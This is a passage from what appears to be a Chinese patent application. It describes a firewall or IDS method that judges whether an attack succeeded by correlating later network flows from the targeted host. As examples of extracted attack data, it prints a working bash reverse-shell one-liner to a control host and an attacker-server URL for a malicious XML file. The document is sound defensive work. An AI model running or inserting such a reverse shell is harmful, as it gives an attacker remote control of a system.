在一些实施例中,上述木马文件包括网页木马(Webshell)文件。
第二方面,提供了一种防护设备,该防护设备包括存储器、网络接口和至少一个处理器,存储器用于存储程序代码,该程序代码被至少一个处理器读取后,该防护设备执行上述第一方面或第一方面任一种可选方式中的方法,具体参见上文的详细描述,此处不再赘述。
第三方面,提供了一种防护系统,防护系统包括存储器、网络接口和至少一个处理器。防护系统中的存储器、网络接口和至少一个处理器分布在不同物理计算机上。存储器用于存储程序代码,该程序代码被至少一个处理器读取后,该防护系统执行上述第一方面或第一方面任一种可选方式中的方法,具体参见上文的详细描述,此处不再赘述。
第四方面,提供了一种攻击成功识别装置,该攻击成功识别装置具有实现上述第一方面或上述第一方面的任意一种可选方式所述方法的功能。所述功能可以通过硬件实现,也可以 通过硬件执行相应的软件实现。所述硬件或软件包括一个或多个与上述功能相对应的单元。
第五方面,提供了一种计算机可读存储介质,该存储介质中存储有至少一条指令,该指令在计算机上运行时,使得计算机执行上述第一方面或第一方面任一种可选方式所提供的方法。
第六方面,提供了一种计算机程序产品,所述计算机程序产品包括一个或多个计算机程序指令,当所述计算机程序指令被计算机加载并运行时,使得所述计算机执行上述第一方面或第一方面任一种可选方式所提供的方法。
第七方面,提供了一种芯片,包括存储器和处理器,存储器用于存储计算机指令,处理器用于从存储器中调用并运行该计算机指令,以执行上述第一方面及其第一方面任意可能的实现方式中的方法。
附图说明
图1是本申请实施例提供的一种典型应用场景的示意图;
图2是本申请实施例提供的一种攻击成功识别方法的流程图;
图3是本申请实施例提供的一种攻击成功识别方法的流程图;
图4是本申请实施例提供的一种攻击成功识别方法的流程图;
图5是本申请实施例提供的一种攻击成功识别方法的流程图;
图6是本申请实施例提供的一种攻击成功识别方法的流程图;
图7是本申请实施例提供的一种攻击成功识别方法的流程图;
图8是本申请实施例提供的一种防护设备的结构示意图;
图9是本申请实施例提供的一种攻击成功识别装置的结构示意图。
具体实施方式
为使本申请的目的、技术方案和优点更加清楚,下面将结合附图对本申请实施方式作进一步地详细描述。
本申请实施例的应用场景包括而不限于针对反弹shell(Reverse Shell,shell是一种用来执行操作系统指令的程序)、外发请求(outgoing requests)、服务器端请求伪造(Server-Side Request Forgery,SSRF)、木马(如网页木马webshell)、内网端口和服务扫描、内网敏感数据的窃取、命令注入、蠕虫、僵尸等各种类型的网络攻击进行攻击成功(successful attack)的识别。
本申请实施例中防护设备是用于网络安全防护的设备。防护设备能够检测并抵御网络攻击和病毒等,以保证数据安全传输。防护设备例如部署在局域网与互联网之间,对进、出局域网的数据流进行检测从而确认是否存在对局域网的攻击,从而保护局域网的网络安全。防护设备包括而不限于防火墙、安全网关(如路由器或交换机)、入侵检测系统(intrusion detection system,IDS)类设备、入侵防御系统(intrusion prevention system,IPS)类设备、统一威胁管理(unified threat management,UTM)设备、反病毒(anti-virus,AV)设备、抗分布式拒绝服务攻击(distributed denial-of-service attack,DDoS)(anti-DDoS)设备、下一代防火墙(Next generation firewall,NGFW)中一项或多项的集成。
本申请实施例中数据流(flow)为包含双向数据的报文流。例如,一条数据流包含A向 B发的报文以及B向A发的报文。数据流例如包括特定传输连接或媒体流中的所有报文。
相关技术只能在服务端的响应内容中包含攻击数据的执行结果的场景下,实现攻击成功判定。而对于没有回显或者响应内容中不包含攻击数据的执行结果的场景下则无法判断是否攻击成功,因此适用场景受限。
而本申请实施例提供了一种基于多流关联(multi-stream association)的思路来识别攻击成功的方法,能够解决服务端无回显或响应内容中不包含攻击数据的执行结果的场景如何攻击成功判定的问题。
下面对本申请实施例的应用场景举例说明。
附图1是本申请实施例提供的一种典型应用场景的示意图。附图1示出了针对企业网络进行网络安全防护的部署场景。
附图1所示的系统架构包括互联网、企业网以及部署在企业网与互联网之间的防火墙、探针以及安全分析设备。
如附图1所示,互联网包括至少一个服务器以及至少一个终端(图1以一个服务器和一个终端为例进行说明)。此外,互联网中还可能存在攻击者。企业网包括至少一个服务器以及至少一个终端。
防火墙、探针、安全分析设备均属于本申请实施例中的防护设备。防火墙、探针、安全分析设备均部署在企业网与互联网之间。
防火墙通过直连方式部署于企业网出口处。用于对进、出企业网的数据流进行过滤,管理进、出企业网的访问行为,并对网络攻击进行检测和报警。防火墙主要用于抵御外部攻击,保护企业网。
探针和安全分析设备通过旁路部署在网络中。探针用于采集进、出企业网的数据流,将数据流上送至安全分析设备。安全分析设备用于对探针采集的数据流进行分析检测。
在附图1所示的场景中,当互联网向局域网发起攻击时,防火墙、探针或者安全分析设备通过执行下述实施例提供的方法,能够准确判定攻击是否成功,具体的方法流程还请参考下文的介绍。
附图1中的企业网可替换为其他类型的局域网,如园区网。
附图1中攻击者位于互联网是可选的,在另一种可能的场景中,攻击者位于企业网中,而被攻击者位于互联网中。
下面对本申请实施例的方法流程举例说明。
附图2是本申请实施例提供的一种攻击成功识别方法200的流程图。方法200包括以下步骤S201至步骤S206。
可选地,方法200所基于的网络部署场景如上述附图1所示。例如,结合附图1来看,方法200中的防护设备例如为附图1中防火墙、探针或者安全分析设备;或者,方法200中的防护设备为附图1中防火墙、探针以及安全分析设备中两种或两种以上设备所集成的设备(例如集群计算机)。方法200中的攻击主机例如为附图1中互联网中攻击者使用的主机。方法200中的被攻击主机例如为附图1中的企业网,例如被攻击主机为企业网中的服务器或者终端。
方法200涉及对多个数据流的处理。为了区分不同的数据流,用“第一数据流”、“第二数据流”区分描述多个不同的数据流。
步骤S201、防护设备对第一数据流进行攻击检测。
在一些实施例中,第一数据流是攻击主机发给被攻击主机的数据流。换句话说,第一数据流的发起方为攻击主机,第一数据流的响应方为被攻击主机。数据流的发起方是指通信双方中采用发送请求等方式触发连接(或称为会话)建立过程的一方,例如针对于传输控制协议(transmission control protocol,TCP)协议来说,发起方是发送同步(synchronize,SYN)报文以触发TCP连接建立过程的通信方。数据流的响应方是指根据发起方的请求,与发起方建立连接的通信方。
步骤S202、若在第一数据流中检测到攻击事件,防护设备从第一数据流的载荷内容中提取攻击数据。
攻击事件包括而不限于反弹shell攻击,外发请求攻击、SSRF攻击、文件植入攻击。
攻击数据用于指示被攻击主机执行指定的行为。攻击主机通过将攻击数据发给被攻击主机,从而触发被攻击主机执行指定的行为,进而实现攻击目的。攻击数据存在很多种可能的数据形式。比如说,攻击数据包括而不限于一段恶意代码、一条或一组恶意命令、一个脚本文件,一条或一组结构化查询语言(Structured Query Language,SQL)语句、一个或一组高危函数的标识,本实施例对攻击数据的形式不做限定。
攻击数据指定的行为包括很多种类型,下面结合几种具体的行为对攻击数据作举例说明,请见下述(1)至(2)。
(1)攻击数据指示被攻击主机访问指定对象。
指定对象的类型包括而不限于主机、资源或者端口等,下面结合指定对象的具体类型对攻击数据的内容和含义举例说明。
(1-1)指定对象是指定主机。
可选地,指定主机是控制端。例如,在反弹shell场景下,指定主机是充当反弹shell的控制端的主机,攻击主机通过控制被攻击主机去连接指定主机从而实现攻击目的。可选地,控制端与攻击主机是两个不同主机。也就是说,攻击场景涉及攻击主机、被攻击主机以及控制端之间三方交互的过程,比如主机A去攻击主机B,攻击的目标是让主机B去连接主机C,在这个例子里,主机A是攻击主机,主机B是被攻击主机,主机C是本实施例谈到的指定主机。或者,可选地,控制端与攻击主机是同一个主机,比如攻击者为了提高攻击效率,使用同一台主机发起攻击并充当控制端。
可选地,指定主机是被攻击主机所在的网络中的一个主机。例如,在SSRF攻击场景下,
指定主机是企业内部的一个办公自动化(Office Automation,OA)系统或者其他无法从外网去访问的主机,攻击主机借助被攻击主机作为跳板去访问指定主机从而实现攻击目的。
指明该指定主机的一种可能实现方式是,载荷内容中的攻击数据包括指定主机的标识。攻击数据指示被攻击主机向该标识对应的指定主机发送连接请求或者数据传输请求。
其中,攻击数据中指定主机的标识的数据形式包括很多种情况。比如说,攻击数据中指定主机的标识为指定主机的地址,或者指定主机的地址和端口号的组合,或者指定主机的域名等。指定主机的地址如IP地址或媒体访问控制(media access control,MAC)地址。
(1-2)指定对象是指定资源。
例如,指定资源为恶意文件。恶意文件包括而不限于病毒、木马等。攻击数据指示被攻击主机请求获取恶意文件,从而利用恶意文件的执行来控制被攻击主机。
例如,指定资源为机密数据。攻击数据指示被攻击主机将局域网中机密数据向互联网中的指定地址传输,从而利用被攻击主机窃取机密数据。
在一些实施例中,攻击数据包括指定资源的标识。攻击数据指示被攻击主机请求该标识对应的指定资源。
攻击数据中指定资源的标识的数据形式包括很多种情况。比如说,攻击数据中指定资源的标识为指定资源的定位符。指定资源的定位符即统一资源定位符(Uniform Resource Locator,URL)。URL是一串或长或短的字符串。举个例子,在利用超文本传输协议(Hypertext Transfer Protocol,HTTP)或超文本传输安全协议(Hyper Text Transfer Protocol over Secure Socket Layer,HTTPS)等协议发起的攻击场景下,攻击主机将恶意文件的URL发给被攻击主机,如果攻击成功了,被攻击主机后续会发送包含恶意文件的URL的HTTP请求,将恶意文件下载到本地。
又比如说,攻击数据中指定资源的标识为指定资源的名称或者存储路径。举个例子,在利用文件传输协议(File Transfer Protocol,FTP)协议发起的攻击场景下,攻击主机将恶意文件的文件路径发给被攻击主机,如果攻击成功了,被攻击主机作为FTP客户端发送包含该文件路径的FTP请求,将恶意文件下载到本地。
(1-3)指定对象是指定端口。
比如,在端口扫描的场景下,攻击数据指示被攻击主机扫描内网中指定端口是否开放,从而为后续的进一步入侵做准备。在一些实施例中,攻击数据包括指定端口的端口号。攻击数据指示被攻击主机向对端口号标识的指定端口进行端口扫描。
上面的(1-1)至(1-3)从攻击数据中指定的对象类型的角度,对攻击数据可能具有的几种情况做了简单介绍。从攻击场景中网络部署位置的角度来看,攻击数据也可能具有多种情况,下面通过(1-a)至(1-b)进行举例说明。
(1-a)指定对象位于互联网中。
例如,攻击数据指示被攻击主机向互联网中的指定主机发送连接请求或者数据传输请求。攻击数据包括指定主机在互联网中的地址(也称公网地址或者外网地址)。又如,攻击数据指示被攻击主机请求互联网中的指定资源。攻击数据包括指定资源在互联网中的定位符。
(1-b)指定对象位于局域网中。
例如,攻击数据指示被攻击主机请求向局域网中指定主机上的指定资源。攻击数据包括指定资源在局域网中的定位符。又如,攻击数据指示被攻击主机向局域网中的指定主机发送连接请求或者数据传输请求。攻击数据包括指定主机在局域网中的地址(也称内网地址)。又如,攻击数据指示被攻击主机对局域网中指定端口进行端口扫描。
(2)攻击数据指示被攻击主机创建指定文件。
指定文件包括而不限于木马文件或者病毒文件。木马文件例如网页木马(Webshell)文件。在一些实施例中,攻击数据包括指定文件的标识。攻击数据中指定文件的标识包括而不限于指定文件的文件名、文件路径、URL等。
例如,在Webshell植入攻击的场景下,载荷内容中的攻击数据为木马文件的创建命令,该创建命令包括文件名。攻击主机通过将木马文件的创建命令发给被攻击主机,从而指示被攻击主机创建并保存该文件名对应的木马文件。
步骤S203、防护设备从第一数据流的报文头获得被攻击主机的标识。
被攻击主机的标识包括被攻击主机的IP地址,或者被攻击主机的IP地址和端口号的组合。
在一些实施例中,被攻击主机的标识是根据第一数据流响应方的目的地址信息确定的。目的地址信息包括目的IP地址,或者目的IP地址和目的端口号的组合。例如,上述报文头包括IP头以及传输层协议头(如TCP头或者UDP头),被攻击主机的IP地址是从第一数据流中IP头中的目的地址(Destination Address,DA)字段中得到的,被攻击主机的端口号是从第一数据流中传输层协议头中的目的端口字段得到的。
步骤S204、防护设备获取第二数据流。
第二数据流与第一数据流是两条不同数据流。第二数据流是第一数据流中的攻击事件发生之后传输的数据流。
其中,这里说到的数据流的不同存在很多种情况。一种典型的场景是,第二数据流与第一数据流属于两次不同的会话。这里的会话包含从建立一条连接至断开这条连接期间传输的报文。比如,攻击主机A向被攻击主机B发起攻击时,攻击主机与被攻击主机之间建立连接1,然后攻击主机通过连接1向被攻击主机发送一条数据流(即本文说的第一数据流)。如果攻击成功,被攻击主机B主动连接攻击主机A指定的主机从而建立连接2,或者攻击主机A重新连接被攻击主机B从而建立连接3。在这个场景中,第二数据流例如是连接2或连接3中传输的数据流,或者尝试建立连接2或者连接3的请求。
此外,可选地,第一数据流中发生的攻击事件与防护设备检测到的攻击事件相同,或者第一数据流中发生的攻击事件与防护设备检测到的攻击事件存在细微的差异。
在一些实施例中,第二数据流的传输时间晚于第一数据流的传输时间。例如,第二数据流中的时间戳晚于第一数据流的时间戳。
可选地,第二数据流与第一数据流的传输时间间隔小于或小于等于时间窗口。例如,第一数据流的传输时间点为t1,时间窗口为T,第二数据流是[t1,t1+T]的时间范围内传输的数据流。可选地,时间窗口是分钟级别的窗口。
上述时间窗口包括多种确定方式。可选地,时间窗口由网络管理人员预先设置。比如,网络管理人员通过命令行界面、Web界面为防护设备配置时间窗口。可替代地,时间窗口由防护设备利用机器学习算法自动学习得出。比如,防护设备用已知的恶意流量、被攻击主机的行为日志等作为样本训练得出机器学习模型,然后防护设备将第一数据流的传输时间输入到训练好的机器学习模型,机器学习模型输出时间窗口。
步骤S205、防护设备根据攻击数据以及被攻击主机的标识,检测第二数据流与第一数据流是否满足关联条件。
关联条件用于判断多个数据流之间是否关联。关联条件包括而不限于主机维度的关联条件、攻击数据维度的关联条件以及协议维度的关联条件。下面对各种维度的关联条件做具体说明。
(A)主机维度的关联条件
主机维度的关联条件用于判断多个数据流是否关联到同一个被攻击主机。用第一数据流和第二数据流这两个数据流作为例子来描述,第二数据流与第一数据流满足主机维度的关联条件包括而不限于下述(A-1)或者(A-2)。
(A-1)满足主机维度的关联条件是指第二数据流的发起方为被攻击主机。
在一些实施例中,防护设备从第二数据流的报文头获得第二数据流的发起方的标识;防护设备判断第二数据流的发起方的标识与被攻击主机的标识是否相同;如果第二数据流的发起方的标识与被攻击主机的标识相同,表明第二数据流的发起方为被攻击主机,防护设备判定满足主机维度的关联条件。
可选地,第二数据流的发起方的标识包括IP地址,或者IP地址和端口号的组合。在一些实施例中,第二数据流的发起方的标识是根据第二数据流的源地址信息确定的。比如,第二数据流的报文头包括IP头以及传输层协议头(如TCP头或者UDP头),第二数据流的发起方的IP地址是从第二数据流中IP头中的源地址(Source Address,SA)字段中得到的,发起方的端口号是从第一数据流中传输层协议头中的源端口字段得到的。
(A-2)满足主机维度的关联条件是指第二数据流的响应方为被攻击主机。
在一些实施例中,防护设备从第二数据流的报文头获得第二数据流的响应方的标识;防护设备判断第二数据流的响应方的标识与被攻击主机的标识是否相同;如果第二数据流的响应方的标识与被攻击主机的标识相同,表明第二数据流的响应方为被攻击主机,防护设备判定为满足主机维度的关联条件。
可选地,第二数据流的响应方的标识包括IP地址,或者IP地址和端口号的组合。在一些实施例中,第二数据流的响应方的标识是根据第二数据流的目的地址信息确定的。比如,第二数据流的报文头包括IP头以及传输层协议头(如TCP头或者UDP头),第二数据流的响应方的IP地址是从第二数据流中IP头中的目的地址(DA)字段中得到的,被响应方的端口号是从第一数据流中传输层协议头中目的端口字段得到的。
(B)攻击数据维度的关联条件
攻击数据维度的关联条件用于判断后续数据流所体现的行为是否与攻击流量中攻击数据关联。用第一数据流和第二数据流这两个数据流作为例子来描述,攻击数据维度的关联条件用于判断第二数据流中是否存在第一数据流中攻击数据所指定的行为。在一种可能的实现中,满足攻击数据维度的关联条件是指第二数据流包括针对指定对象的请求。
在一些实施例中,针对指定对象的请求包含攻击数据中指定对象的标识。比如,指定对象是指定主机,请求对应的报文头包括指定主机的地址、或者指定主机的地址和端口号的组合。又如,指定对象是指定资源,请求是一个HTTP请求,该HTTP请求的请求行包括指定资源的URL。
其中,这里说到的请求包括而不限于建立连接请求、数据传输请求、状态探测请求等等。建立连接请求包括而不限于TCP中的三次握手请求。数据传输请求包括而不限于HTTP请求(如get请求或post请求)、FTP请求(如文件上传请求或者文件下载请求)等。
结合前面在步骤S202(1)中谈到的攻击数据的各种可能情况,例如,满足攻击数据维度的关联条件是指第二数据流包括被攻击主机向指定主机发送的请求,该指定主机包括而不限于控制端、攻击者或内网中被攻击主机之外的其他主机。又如,满足攻击数据维度的关联条件是指第二数据流包括被攻击主机针对指定资源的获取请求,该指定资源包括而不限于恶意文件、机密数据等。再如,满足攻击数据维度的关联条件是指第二数据流包括被攻击主机针对内网中指定端口的状态探测请求(或者说端口扫描请求)。
结合前面在步骤S202(2)中谈到的攻击数据的各种可能情况,例如,满足攻击数据维 度的关联条件是指第二数据流包括向被攻击主机发送的针对指定文件的访问成功请求。
(C)协议维度的关联条件
协议维度的关联条件用于判断后续数据流所基于的协议是否与攻击流量关联。用第一数据流和第二数据流这两个数据流作为例子来描述,第二数据流与第一数据流满足协议维度的关联条件包括而不限于下述(C-1)或者(C-2)。
(C-1)第二数据流所基于的协议为第一数据流的载荷使用的协议。
第一数据流的载荷使用的协议包括而不限于HTTP、HTTPS、域名系统(Domain Name System,DNS)、远程方法调用(Remote Method Invocation,RMI)、轻型目录访问协议(Lightweight Directory Access Protocol,LDAP)等。比如说,第一数据流的载荷使用的协议是HTTP协议。如果第二数据流为HTTP流,那么第二数据流与第一数据流满足协议维度的关联条件;如果第二数据流为DNS流,那么第二数据流与第一数据流不满足协议维度的关联条件。
(C-2)第二数据流所基于的协议为第一数据流中攻击类型对应的协议。
例如,第一数据流中攻击事件属于攻击类型A,攻击类型A的典型场景是利用协议A提供的通信交互机制进行攻击,如果第二数据流所基于的协议为协议A,那么第二数据流与第一数据流满足协议维度的关联条件。举个具体的例子,第一数据流中攻击事件是反弹shell攻击,反弹shell攻击的典型场景是被攻击主机向反弹shell控制端发起TCP连接请求,如果第二数据流所基于的协议为TCP流,那么第二数据流与第一数据流满足协议维度的关联条件。当然,反弹shell攻击的场景下用TCP作为协议维度的关联条件仅是举例,本实施例对反弹shell攻击的场景下用哪一种协议作为关联条件不做限定。
在一种可能的实现中,防护设备保存一个查询表,该查询表保存至少一组攻击类型与协议类型之间的对应关系。防护设备在第一数据流中检测到攻击事件之后,防护设备用攻击事件所属的攻击类型作为查询索引,从查询表中查询得到攻击类型对应的协议类型。防护设备使用查询到的攻击类型对应的协议类型,检测第二数据流与第一数据流是否满足协议维度的关联条件。
以上从主机维度、攻击数据维度以及协议维度对关联条件的各种可能情况做了举例说明。由于为多流设定各种维度的关联条件,从而更加精确地发现多流之间的关联关系,因此有助于更加精细化的实现多流关联识别,进而提高识别攻击成功的准确性。
值得说明的一点是,上述各种维度的关联条件可选地通过任意方式结合。例如,不同维度的关联条件可选地以“且”的逻辑关系结合,或者可选地以“或”的逻辑关系结合,不同维度的关联条件的匹配先后顺序(或者说优先级)可选地根据场景或者配置确定。
此外,上面列举的种种关联条件均为示例性地,本实施例并不对具体的关联条件进行限定。
步骤S206、如果第二数据流与第一数据流满足关联条件,防护设备确定攻击事件为执行成功的攻击事件。
以上提供了一种利用多流关联的机制判定是否攻击成功的方法,通过从检测到攻击事件的数据流中获得攻击数据以及被攻击主机的标识,利用攻击数据以及被攻击主机的标识,对检测到攻击事件的数据流与该数据流之后的其他数据流进行关联,根据是否关联到其他数据流来判定是否攻击成功。该方法能够解决服务端无回显或响应内容中不包含攻击数据的执行 结果的场景如何攻击成功判定的问题,适用场景更加丰富,有助于更有效地从海量攻击告警中识别出执行成功的攻击事件。
以上介绍了攻击成功识别的整体流程,下面结合四种攻击场景对具体如何进行两个流之间的关联做举例说明。
场景一、反弹shell攻击
反弹shell攻击为被攻击主机向反弹shell的控制端发送请求(如连接请求或者数据传输请求)从而发起的攻击。反弹shell攻击的基本原理是,攻击主机向被攻击主机发送反弹shell攻击报文,反弹shell攻击报文的载荷内容包括反弹shell的控制端的地址。在攻击成功的情况下,被攻击主机收到反弹shell攻击报文之后,会主动向攻击报文中地址对应的控制端发送连接请求,从而与控制端建立连接。之后,被攻击主机通过该连接,接收来自于控制端的指令;被攻击主机执行控制端的指令,并将指令的输出结果通过该连接返回给控制端。
反弹shell的控制端和攻击主机的角色分别由不同或相同的主机扮演。可选地,反弹shell的控制端和攻击主机是两台不同的主机。换句话说,反弹shell的控制端相对于攻击主机以及被攻击主机来说相当于第三方主机。在这种情况下,反弹shell攻击报文的发起方与反弹shell攻击执行成功的情况下被攻击主机发送的请求的响应方不同。可替代地,反弹shell的控制端和攻击主机是同一台主机。在这种情况下,反弹shell攻击报文的发起方与反弹shell攻击执行成功的情况下被攻击主机发送的请求的响应方相同。
将上面介绍的反弹shell攻击的场景与附图2所示方法200联系起来,方法200中第一数据流包含反弹shell攻击报文,反弹shell攻击报文包含反弹shell的控制端的地址,控制端的地址包括控制端的IP地址、或者控制端的IP地址和端口号的组合。在反弹shell攻击成功的情况下,反弹shell攻击事件发生之后传输的数据流会包含这样的特征:数据流的发起方为被攻击主机,数据流的响应方为反弹shell的控制端。数据流包含来自被攻击主机的连接请求,或者包含被攻击主机执行控制端的指令所得到的输出结果。防护设备通过执行方法200,能够关联到具有上述特征的数据流(即方法200中第二数据流),从而确定反弹shell攻击成功。
在一种可能的实现中,在反弹shell攻击场景下,防护设备根据被攻击主机的地址以及反弹shell的控制端的地址,实现两个数据流之间的关联。可选地,防护设备还将TCP作为关联条件,具体针对攻击事件发生之后传输的TCP流进行关联。
具体地,防护设备从第一数据流的载荷内容包含的攻击数据中,获得被攻击主机的地址以及反弹shell的控制端的地址。如果第二数据流的发起方的地址包括被攻击主机的地址,且第二数据流的响应方的地址为反弹shell的控制端的地址,这种情况为第二数据流与第一数据流满足关联条件,防护设备会确定反弹shell攻击事件为执行成功的攻击事件。其中,被攻击主机的地址例如为被攻击主机的IP地址。可选地,第二数据流为TCP流。
场景二、外发请求攻击
外发请求攻击为被攻击主机请求互联网中指定主机上资源从而发起的攻击。外发请求攻击的基本原理是,攻击主机向被攻击主机发送外发请求攻击报文。在攻击成功的情况下,被攻击主机收到外发请求攻击报文之后,会主动发送针对互联网中指定主机上资源的请求,而该互联网中指定主机上资源往往包含恶意代码,从而影响被攻击主机的安全。
将上面介绍的外发请求攻击的场景与附图2所示方法200联系起来,方法200中第一数 据流包含外发请求攻击报文,外发请求攻击报文的载荷内容中的攻击数据包括互联网中指定主机上资源的定位符。在外发请求攻击成功的情况下,外发请求攻击事件发生之后传输的数据流会包含这样的特征:数据流的发起方为被攻击主机,数据流的响应方为互联网中指定主机。数据流包含来自被攻击主机针对互联网中指定主机上资源的请求。防护设备通过执行方法200,能够关联到具有上述特征的数据流(即方法200中第二数据流),从而确定外发请求攻击成功。
在一种可能的实现中,在外发请求攻击的场景下,防护设备根据被攻击主机的地址、互联网中指定主机上资源的定位符以及载荷使用的协议,实现两个数据流之间的关联。具体地,防护设备从载荷内容包含的攻击数据中,获得被攻击主机的地址以及互联网中指定主机上资源的定位符,并确定第一数据流的载荷使用的协议。如果第二数据流的发起方地址包括被攻击主机的地址,且第二数据流包括互联网中指定主机上资源的定位符,且第二数据流所基于的协议为第一数据流的载荷使用的协议,防护设备确定外发请求攻击事件为执行成功的攻击事件。其中,被攻击主机的地址例如为被攻击主机的IP地址。
场景三、SSRF攻击
SSRF攻击为被攻击主机请求局域网中指定主机上资源从而发起的攻击。SSRF攻击的基本原理是,攻击主机向被攻击主机发送SSRF攻击报文。SSRF攻击报文通常是攻击主机伪造的获取被攻击主机上资源的请求,该请求的典型情况是包含类似于嵌套形式的URL,该URL的主机字段包括被攻击主机的域名或IP地址,而该URL的参数字段又包含局域网中指定主机上资源的URL。在攻击成功的情况下,被攻击主机收到SSRF攻击报文之后,会主动发送针对局域网中指定主机上资源的请求,对局域网的安全性造成不利影响。
将上面介绍的SSRF攻击的场景与附图2所示方法200联系起来,方法200中第一数据流包含SSRF攻击报文,SSRF攻击报文的载荷内容中的攻击数据包括局域网中指定主机上资源的URL。在SSRF攻击成功的情况下,SSRF攻击事件发生之后传输的数据流会包含这样的特征:数据流的发起方为被攻击主机,数据流的响应方为局域网中指定主机。数据流包含来自被攻击主机针对局域网中指定主机上资源的请求。防护设备通过执行方法200,能够关联到具有上述特征的数据流(即方法200中第二数据流),从而确定攻击成功。
在一种可能的实现中,在SSRF攻击的场景下,防护设备根据被攻击主机的地址、局域网中指定主机上资源的定位符以及载荷使用的协议,实现两个数据流之间的关联。具体地,防护设备从载荷内容包含的攻击数据中,获得被攻击主机的地址以及局域网中指定主机上资源的定位符,并确定第一数据流的载荷使用的协议。如果第二数据流的发起方地址包括被攻击主机的地址,且第二数据流包括局域网中指定主机上资源的定位符,且第二数据流所基于的协议为第一数据流的载荷使用的协议,防护设备确定SSRF攻击事件为执行成功的攻击事件。其中,被攻击主机的地址例如为被攻击主机的IP地址。
场景四、文件植入攻击
文件植入攻击为向被攻击主机植入木马文件从而发起的攻击。文件植入攻击的详细介绍可参考下述实例四相关的内容。
在一种可能的实现中,在文件植入攻击的场景下,防护设备根据被攻击主机的地址以及木马文件的文件名,实现两个数据流之间的关联。具体地,防护设备从载荷内容包含的攻击数据中,获得被攻击主机的地址以及木马文件的文件名。如果第二数据流的响应方地址包括 被攻击主机的地址,且第二数据流包括针对木马文件的访问成功请求,防护设备确定文件植入攻击事件为执行成功的攻击事件。其中,被攻击主机的地址例如为被攻击主机的IP地址。
下面结合附图3实施例以及四个实例,对上述方法200举例说明。
附图3的流程包括以下步骤S31至步骤S35。
步骤S31防护设备提取数据流,作为下述步骤S32中攻击检测过程的输入。
步骤S32防护设备调用不同攻击检测算法,对数据流进行攻击检测,如反序列化攻击检测、XML外部实体(XXE)攻击检测、命令注入检测、溢出攻击检测等。
步骤S33防护设备在数据流中检测到攻击事件后,从数据流的载荷内容中获得攻击数据。防护设备根据攻击数据进行攻击成功判定。攻击成功判定即判定攻击事件是否为执行成功的攻击事件。
步骤S34在有回显(即响应内容中包含攻击数据的执行结果)的攻击场景下,防护设备通过单流判定的方式进行攻击成功判定。具体地,防护设备根据上述检测到攻击的数据流中服务端的响应报文是否包含攻击数据对应的预期结果,来判定攻击事件是否为执行成功的攻击事件。
步骤S35在没有回显的场景下,防护设备通过多流关联的方式进行攻击成功判定。具体地,防护设备基于攻击数据执行成功后预期的后续行为去关联后续传输的其他数据流。若关联到预期的后续行为,则防护设备判定攻击事件为执行成功的攻击事件。
下面结合四个实例对附图3的流程举例说明。下述四个实例对应四种攻击场景,分别是反弹shell攻击、外发请求攻击、SSRF攻击以及文件植入攻击。下述四个实例中用T表示具体的时间窗。
实例一
实例一是对附图2所示方法的举例说明。在实例一提供的方法中,附图2中检测的攻击事件为反弹shell攻击事件。实例一示出了反弹shell攻击的场景下如何基于多流关联的机制识别是否攻击成功。反弹shell攻击成功判定的流程图具体如图4所示,包括以下步骤S40至步骤S45。
步骤S40防护设备对输入的数据流(即图2中的第一数据流)进行攻击检测,检测到反弹shell攻击事件。
步骤S41防护设备对数据流进行解析,得到反弹shell攻击报文的载荷内容。其中反弹shell攻击报文是指引发生成反弹shell攻击事件的报文。
步骤S42防护设备从载荷内容中提取攻击数据,解析攻击数据,提取反弹shell控制端的IP地址和控制端的端口号。
步骤S43防护设备关联反弹shell攻击事件往后的一段时间T内的TCP流(即图2中的第二数据流)。例如T的取值范围为[0,5min]。
T取值范围说明:一般情况下被攻击主机成功执行攻击数据后,被攻击主机会立即执行后续操作,时间间隔在秒级范围内,考虑到现网环境复杂性,增强关联分析成功率,在此将T的取值范围设置为[0,5min]。
步骤S44若关联到一条TCP流的源IP地址为被攻击主机的IP地址,目的IP地址为反弹 shell控制端的IP地址,端口号为反弹shell控制端的端口号,这种情况说明被攻击主机被攻击后,成功执行了反弹shell攻击数据,并主动向反弹shell控制端发起了连接请求,防护设备判定反弹shell攻击事件为执行成功的攻击事件。
步骤S45若没有关联到符合上述关联条件的TCP流,则防护设备判定反弹shell攻击事件为执行失败的攻击事件。
上述流程示例说明如下。
上述步骤S42中,防护设备从反弹shell攻击报文的载荷内容中提取的攻击数据如下。
bash-i>&/dev/tcp/192.168.1.10/4444 0>&1
防护设备从攻击数据中提取的反弹shell控制端的IP地址为:192.168.1.10,反弹shell控制端的端口号为4444。
上述步骤S44中,若在上述攻击发生后的流量中,发现有一数据流中包含被攻击主机向反弹shell控制端IP地址192.168.1.10和端口4444发起TCP连接请求,无论反弹shell连接是否成功建立,都说明被攻击主机成功执行了反弹shell攻击数据,则防护设备判定反弹shell攻击事件为执行成功的攻击事件。
实例二
实例二是对附图2所示方法的举例说明。在实例二提供的方法中,附图2中检测的攻击事件为外发请求攻击事件。实例二示出了外发请求攻击的场景下如何基于多流关联的机制识别是否攻击成功。外发请求攻击成功判定如图5所示,包括以下步骤S50至步骤S55。
步骤S50防护设备对输入的数据流(即图2中的第一数据流)进行攻击检测,检测到外发请求攻击事件。
步骤S51防护设备对数据流中的报文进行解析,得到外发请求攻击报文的载荷内容。
步骤S52防护设备从载荷内容中提取攻击数据,解析攻击数据,提取外发请求URL。
步骤S53防护设备关联外发请求攻击事件发生后的一段时间T内(同实例一,T的取值范围为[0,5min]),被攻击主机是否向外发请求URL发送了连接请求。需要关联的数据流需要根据载荷中具体的协议确定,如HTTP、HTTPS、DNS、RMI、LDAP等。
步骤S54若关联到包含被攻击主机发送的对外连接请求的数据流(即图2中的第二数据流),则防护设备判定外发请求攻击事件为执行成功的攻击事件。
步骤S55若没有关联到符合上述关联条件的数据流,防护设备判定外发请求攻击事件为执行失败的攻击事件。
上述流程示例说明如下。
在上述步骤S52中,防护设备从基于反序列化的外发请求攻击报文的载荷内容中提取的攻击数据如下所示。
Figure PCTCN2021112867-appb-000001
防护设备从以上攻击数据中提取的外发请求URL为:http://attacker_server/evil.xml,该URL为攻击者控制的恶意URL,该URL对应的文件evil.xml往往包含恶意代码。
在上述步骤S54中,若在上述攻击发生后的流量中,防护设备发现有一条数据流中包含被攻击主机向外部URLhttp://attacker_server/evil.xml发起连接请求,无论是否建立HTTP连接,都说明被攻击主机成功执行了攻击数据,则防护设备判定攻击成功。
实例三
实例三是对附图2所示方法的举例说明。在实例三提供的方法中,附图2中检测的攻击事件为SSRF攻击事件。SSRF攻击成功判定如图6所示,包括以下步骤S60至步骤S65。
